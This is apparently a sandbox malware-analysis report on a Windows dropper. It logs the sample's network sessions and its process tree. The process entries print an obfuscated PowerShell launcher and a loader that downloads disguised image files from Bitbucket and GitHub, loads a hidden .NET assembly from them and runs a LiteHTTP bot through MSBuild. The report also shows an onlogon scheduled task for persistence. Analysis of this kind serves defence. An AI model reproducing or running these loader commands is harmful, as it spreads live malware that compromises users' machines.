                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.166.143.48 | 443 | 8000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-03 22:19:59 UTC | 109 | OUT | GET /ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612 HTTP/1.1
                                                                                                                    Host: bitbucket.org
                                                                                                                    Connection: Keep-Alive
2025-01-03 22:20:00 UTC | 5894 | IN | HTTP/1.1 302 Found
                                                                                                                    Date: Fri, 03 Jan 2025 22:20:00 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 0
                                                                                                                    Server: AtlassianEdge
                                                                                                                    Location: https://bbuseruploads.s3.amazonaws.com/d0a43d21-72a8-4789-9e4a-6c02f03bb585/downloads/196619b4-f993-4aa1-be6b-8d7a85109d1d/img.jpg?response-content-disposition=attachment%3B%20filename%3D%22img.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNB2WPJBXR&Signature=lwsP7gnHd8roKWARL5%2F30w838OY%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEB8aCXVzLWVhc3QtMSJIMEYCIQD1adYtJEPex4fpYw9bPcmyyvKVwy116rMoDm5E%2Fgtj%2FwIhALd5RVlGK9zMCQQpLrc%2FhZRZdW5gCLL47O4597JcPhFIKrACCPf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2Igz9QKdLM7hLvedkt0cqhAJjtPVgfS4lbtP5ZWuNkq3HFL6RMdJqizq6t2mvLFRfJy3ZxwRKOcpbdrfV9tUisFtfPiuyq2WKMcEIoI0OwpVnm%2Fe2%2F0iHI3o3H0TiE0DKUaWAhvVlOpLvEhQH6V9SO%2B%2BULgQykt1E5HQovRoplqfgP0CPB9UehzKwX2XXeqQyJ7pE6a2j1ErGZ1nOhe9MJ9WvJ5uWk%2B1Pce3NnlacDrMzabgdcLjnwRWJqz30v0DVM7aXxuFrLgUSuokPrtch6F6a8EBg2xCT9SkyXrbGLYZ7abgVOQYQ62R8lW6cKsAYYdnIv3TjvCANyTjYWcR0DJXUhriKzvyqOpohFKcmMBvM7J6zaDCQxeG7BjqcAai%2F1elj%2Fq3HjAkGO0zugvQxRQPBpHCDPTtXGMbgLGNCWDni0iJCn2TanguAdRMbFOZ0N%2BtdrIlt1H1dva9ZFWfAXuXQXodE7R5kF7GJgG8EK3PCgG%2BMy [TRUNCATED]
                                                                                                                    Expires: Fri, 03 Jan 2025 22:20:00 GMT
                                                                                                                    Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                    X-Used-Mesh: False
                                                                                                                    Vary: Accept-Language, Origin
                                                                                                                    Content-Language: en
                                                                                                                    X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                    X-Dc-Location: Micros-3
                                                                                                                    X-Served-By: b40ab98214d9
                                                                                                                    X-Version: c9b3998323c0
                                                                                                                    X-Static-Version: c9b3998323c0
                                                                                                                    X-Request-Count: 592
                                                                                                                    X-Render-Time: 0.5190036296844482
                                                                                                                    X-B3-Traceid: 38d2945ed9f84287866830d22cf27d9b
                                                                                                                    X-B3-Spanid: 91770a058436b90e
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--cate [TRUNCATED]
                                                                                                                    X-Usage-Quota-Remaining: 987364.382
                                                                                                                    X-Usage-Request-Cost: 12781.07
                                                                                                                    X-Usage-User-Time: 0.310753
                                                                                                                    X-Usage-System-Time: 0.072679
                                                                                                                    X-Usage-Input-Ops: 0
                                                                                                                    X-Usage-Output-Ops: 0
                                                                                                                    Age: 0
                                                                                                                    X-Cache: MISS
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-Xss-Protection: 1; mode=block
                                                                                                                    Atl-Traceid: 38d2945ed9f84287866830d22cf27d9b
                                                                                                                    Atl-Request-Id: 38d2945e-d9f8-4287-8668-30d22cf27d9b
                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                    Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                    Server-Timing: atl-edge;dur=626,atl-edge-internal;dur=3,atl-edge-upstream;dur=625,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 185.199.111.133 | 443 | 8000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-03 22:20:00 UTC | 121 | OUT | GET /gmedusa135/nano/refs/heads/main/new_img123.jpg HTTP/1.1
                                                                                                                    Host: raw.githubusercontent.com
                                                                                                                    Connection: Keep-Alive
2025-01-03 22:20:00 UTC | 888 | IN | HTTP/1.1 200 OK
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 4697658
                                                                                                                    Cache-Control: max-age=300
                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                    Content-Type: image/jpeg
                                                                                                                    ETag: "b899cc7aa3319a16e239ba6cb263113b100d6fa7ed0190f683f329a66758220c"
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-Frame-Options: deny
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    X-GitHub-Request-Id: 2A68:16C754:465444:4D7ACD:67786290
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Date: Fri, 03 Jan 2025 22:20:00 GMT
                                                                                                                    Via: 1.1 varnish
                                                                                                                    X-Served-By: cache-ewr-kewr1740062-EWR
                                                                                                                    X-Cache: MISS
                                                                                                                    X-Cache-Hits: 0
                                                                                                                    X-Timer: S1735942801.849083,VS0,VE56
                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                    X-Fastly-Request-ID: 17276533fe8f283df1821fb9ee95a5fbba9c91e0
                                                                                                                    Expires: Fri, 03 Jan 2025 22:25:00 GMT
                                                                                                                    Source-Age: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 185.166.143.48 | 443 | 8000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-03 22:20:09 UTC | 103 | OUT | GET /fqwfwrqwe/werwfqwf/downloads/pbbcnnk.txt HTTP/1.1
                                                                                                                    Host: bitbucket.org
                                                                                                                    Connection: Keep-Alive
2025-01-03 22:20:10 UTC | 5916 | IN | HTTP/1.1 302 Found
                                                                                                                    Date: Fri, 03 Jan 2025 22:20:10 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 0
                                                                                                                    Server: AtlassianEdge
                                                                                                                    Location: https://bbuseruploads.s3.amazonaws.com/e3c0f433-171c-46e2-89e0-333c78666859/downloads/b6ce439c-77f0-4c70-80bf-c31644de3b36/pbbcnnk.txt?response-content-disposition=attachment%3B%20filename%3D%22pbbcnnk.txt%22&AWSAccessKeyId=ASIA6KOSE3BNMJEEV3FX&Signature=z6SeEEmtoWPAk%2Bh79ka8wMIffkg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEB8aCXVzLWVhc3QtMSJGMEQCIBNJmShv7MGKINf2cFLnqR6qyLtPe98WLo7eDI9nQcNyAiAN6HDMTik4z8uQLRDJhMts25H6pPl7Yd4U0Vq62UnK%2BSqwAgj3%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIM9t%2FCyMR70fx2FzCcKoQCXAjF45TfCV1fS6QZGBy56NaisJivwPlbDu%2Bnl98ll7DIvxurRbCCrTVLgI4LQynZnjuZvsiqnDUoNbORBgTWGJU5uYv4iLjk4tTmBS%2B9xetZkTp5LmCRubDsgSNP%2BqADqgSaNmv%2BWfVNWqMN8divArRrR9ER%2Bete9%2BlnREMX87DwhO1aMuQ50M8ywOZp97IB%2B0vVwHTEXWW%2BF36a%2FHKcAQHseZz%2FGDQCdCYq2ShfmMQnO53E2prvYX1wAG3mwY3af0Bw47PhA57rXXKLXSu85BI%2F3jGtdUtmMd%2B9xhbxbWYRivLXWOAHE0xUSTZTmFi1SXYrGVfXLQkKHBeZDxkL6NKHb%2FIw7cLhuwY6ngFG9dexa8v%2BqlSQ1OHbxL1SLgJZVR9ROphuLtPTEivNX9TCHpw0gW13lOyyGCDi5EM5C7mFfXpA8dH2%2BRyekxJMAGUn3SuYq5WACq1 [TRUNCATED]
                                                                                                                    Expires: Fri, 03 Jan 2025 22:20:10 GMT
                                                                                                                    Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                    X-Used-Mesh: False
                                                                                                                    Vary: Accept-Language, Origin
                                                                                                                    Content-Language: en
                                                                                                                    X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                    X-Dc-Location: Micros-3
                                                                                                                    X-Served-By: 0b831889bda4
                                                                                                                    X-Version: c9b3998323c0
                                                                                                                    X-Static-Version: c9b3998323c0
                                                                                                                    X-Request-Count: 3779
                                                                                                                    X-Render-Time: 0.05969715118408203
                                                                                                                    X-B3-Traceid: ed66f170283e4292939316583b051859
                                                                                                                    X-B3-Spanid: db3ab7d825502d31
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary. [TRUNCATED]
                                                                                                                    X-Usage-Quota-Remaining: 989287.382
                                                                                                                    X-Usage-Request-Cost: 902.33
                                                                                                                    X-Usage-User-Time: 0.027070
                                                                                                                    X-Usage-System-Time: 0.000000
                                                                                                                    X-Usage-Input-Ops: 0
                                                                                                                    X-Usage-Output-Ops: 0
                                                                                                                    Age: 0
                                                                                                                    X-Cache: MISS
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-Xss-Protection: 1; mode=block
                                                                                                                    Atl-Traceid: ed66f170283e4292939316583b051859
                                                                                                                    Atl-Request-Id: ed66f170-283e-4292-9393-16583b051859
                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                    Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                    Server-Timing: atl-edge;dur=168,atl-edge-internal;dur=4,atl-edge-upstream;dur=166,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49733 | 52.216.138.83 | 443 | 8000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-03 22:20:11 UTC1199OUTGET /e3c0f433-171c-46e2-89e0-333c78666859/downloads/b6ce439c-77f0-4c70-80bf-c31644de3b36/pbbcnnk.txt?response-content-disposition=attachment%3B%20filename%3D%22pbbcnnk.txt%22&AWSAccessKeyId=ASIA6KOSE3BNMJEEV3FX&Signature=z6SeEEmtoWPAk%2Bh79ka8wMIffkg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEB8aCXVzLWVhc3QtMSJGMEQCIBNJmShv7MGKINf2cFLnqR6qyLtPe98WLo7eDI9nQcNyAiAN6HDMTik4z8uQLRDJhMts25H6pPl7Yd4U0Vq62UnK%2BSqwAgj3%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIM9t%2FCyMR70fx2FzCcKoQCXAjF45TfCV1fS6QZGBy56NaisJivwPlbDu%2Bnl98ll7DIvxurRbCCrTVLgI4LQynZnjuZvsiqnDUoNbORBgTWGJU5uYv4iLjk4tTmBS%2B9xetZkTp5LmCRubDsgSNP%2BqADqgSaNmv%2BWfVNWqMN8divArRrR9ER%2Bete9%2BlnREMX87DwhO1aMuQ50M8ywOZp97IB%2B0vVwHTEXWW%2BF36a%2FHKcAQHseZz%2FGDQCdCYq2ShfmMQnO53E2prvYX1wAG3mwY3af0Bw47PhA57rXXKLXSu85BI%2F3jGtdUtmMd%2B9xhbxbWYRivLXWOAHE0xUSTZTmFi1SXYrGVfXLQkKHBeZDxkL6NKHb%2FIw7cLhuwY6ngFG9dexa8v%2BqlSQ1OHbxL1SLgJZVR9ROphuLtPTEivNX9TCHpw0gW13lOyyGCDi5EM5C7mFfXpA8dH2%2BRyekxJMAGUn3SuYq5WACq1%2F8nc%2F%2FDn6Zi928v7gZvFhsPeVs350Qyj22FiTV [TRUNCATED]
                                                                                                                    Host: bbuseruploads.s3.amazonaws.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-03 22:20:11 UTC525INHTTP/1.1 200 OK
                                                                                                                    x-amz-id-2: WI/d/8MWgkx6kGjf1gbtor4aSF0H0BkfHXqrY1kQ63C7Ric+sj1AY0qsIDCeYul2kJ7is3uJMmg=
                                                                                                                    x-amz-request-id: KP4JMETCTYDJ8PPQ
                                                                                                                    Date: Fri, 03 Jan 2025 22:20:12 GMT
                                                                                                                    Last-Modified: Fri, 03 Jan 2025 20:45:14 GMT
                                                                                                                    ETag: "509d8394ffe033d82e56aa6363ae1803"
                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                    x-amz-version-id: uk_.l.9PBFz9NDoCRp7VJOcxx_Hvx3b.
                                                                                                                    Content-Disposition: attachment; filename="pbbcnnk.txt"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Content-Type: text/plain
                                                                                                                    Content-Length: 65552
                                                                                                                    Server: AmazonS3
                                                                                                                    Connection: close



                                                                                                                    Target ID:0
                                                                                                                    Start time:17:19:54
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Users\user\Desktop\3lhrJ4X.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Users\user\Desktop\3lhrJ4X.exe"
                                                                                                                    Imagebase:0x7ff761f70000
                                                                                                                    File size:163'840 bytes
                                                                                                                    MD5 hash:21B5E69AEC540EAACE5AA6D588896218
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:1
                                                                                                                    Start time:17:19:54
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:cmd.exe /c 67784c48226c6.vbs
                                                                                                                    Imagebase:0x7ff74e980000
                                                                                                                    File size:289'792 bytes
                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:2
                                                                                                                    Start time:17:19:54
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:3
                                                                                                                    Start time:17:19:54
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs"
                                                                                                                    Imagebase:0x7ff7be2a0000
                                                                                                                    File size:170'496 bytes
                                                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:4
                                                                                                                    Start time:17:19:55
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$
';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                    File size:452'608 bytes
                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:5
                                                                                                                    Start time:17:19:55
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:6
                                                                                                                    Start time:17:19:57
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                    File size:452'608 bytes
                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000006.00000002.1823716932.000001D3BBA89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:7
                                                                                                                    Start time:17:20:02
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                                                                                                                    Imagebase:0x7ff6ca160000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:8
                                                                                                                    Start time:17:20:10
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xc80000
                                                                                                                    File size:262'432 bytes
                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000008.00000002.4118790717.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:12
                                                                                                                    Start time:17:20:55
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"schtasks" /Query /TN "Msbuild"
                                                                                                                    Imagebase:0x2d0000
                                                                                                                    File size:187'904 bytes
                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:13
                                                                                                                    Start time:17:20:55
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:14
                                                                                                                    Start time:17:20:56
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "Msbuild" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
